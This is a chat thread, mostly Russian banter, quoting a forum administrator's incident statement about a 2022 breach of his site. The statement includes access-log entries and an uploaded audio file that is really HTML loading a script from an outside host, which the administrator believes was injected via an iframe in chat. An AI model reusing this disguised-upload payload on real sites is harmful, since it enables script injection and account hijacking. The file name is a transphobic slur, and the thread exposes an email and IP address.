Ебать веселье поперло. А че за сайт?

@komar vsys? украинский хостинг

@voker57 нашли на кого положиться

@voker57 Блять, с какого сайта аватарки?

@komar форчана по ходу

This statement regards user impact. - Assume your password for the Kiwi Farms has been stolen. - Assume your email has been leaked. - Assume any IP you've used on your Kiwi Farms account in the last month has been leaked. The attacker had access to my admin account, probably through session hijacking (bypassing password and 2fa). He would have been able to access user data, and XenForo provides a way to export user lists with information that is precisely: email, username, last acitivity, register date, user state (banned/unverified), post count, and if they are staff. However, 2a03:e600:100::31 - - [18/Sep/2022:08:16:13 +0000] "GET /admin.php?users/list-export&export=1 HTTP/2.0" 500 0 "https://kiwifarms.st/admin.php?users/list" "Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0" In this access.log entry for the only attempt made to export this information, he tried to export 120k+ users at once. This caused it to crash and respond Error 500. No other attempt was made to export the user list. It's unclear if he obtained any user information. I am still deducing the attack vector. I currently have two theories that I will explain later.

@voker57 ебаный ipv6

@komar The issue was a script injection. I am working on the details. Here is my challenge to any hackers or aspiring hackers. There is a file called troonshine.opus, with the contents of this: <!DOCTYPE html> <script src=//poz.hiv/load.js></script> The web document, on the same domain, has a CORS rule that looks like this: <meta http-equiv="Content-Security-Policy" content="script-src &#39;self&#39; &#39;nonce-0113ffa9cf5af884e070dd1e36188e5db5ba4bbdacaef1c21a733cea089a7fce&#39;" /> What could you possibly put into that document to get it to load the .opus and have the script execute? The more finer details are this: XenForo does not validate any file contents. You can write an .opus file that is basically just an HTML document loading a script off-site and if you somehow open it, it does run. I have confirmed this. The question is of how it got injected. The chat on Kiwi Farms was a Rust websocket chat that was part of a forum rewrite I had been working on. Relevant source: https://github.com/jaw-sh/ruforo/blob/master/src/bin/xf_chat/main.rs https://github.com/jaw-sh/ruforo/blob/master/resources/js/chat.js https://github.com/jaw-sh/ruforo/tree/master/src/bbcode What baffles me is that even if we did theoretically pass the client a message that was simply instruction to load another script, it should not work, because the security policy of the chat explicitly says that no scripts should run — EVEN FROM THE SAME DOMAIN — unless they are given a nonce token. I know it happened in the chat, though, because I found the access.log entry where it gets opened: x.x.x.x - - [18/Sep/2022:03:03:53 -0400] "GET /data/audio/3696/3696202-c63cc36fd4acb874fdebd0b3988c3410.opus HTTP/1.1" 200 90 "https://kiwifarms.st/test-chat?style=dark" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36" So what can be done to make an .opus media file load as an inline web document which can execute its own scripts that violate the CORS of the web document it&#39;s loaded into? I just don&#39;t understand. <jcmoon@pm.me> P.S. If you&#39;re going to write me and take credit for the attack, include the name of the random user you made an admin. Edit: I believe that the .opus file with the xss payload was injected via an iframe that was somehow added to chat. I don&#39;t know how they rendered an iframe but that would work.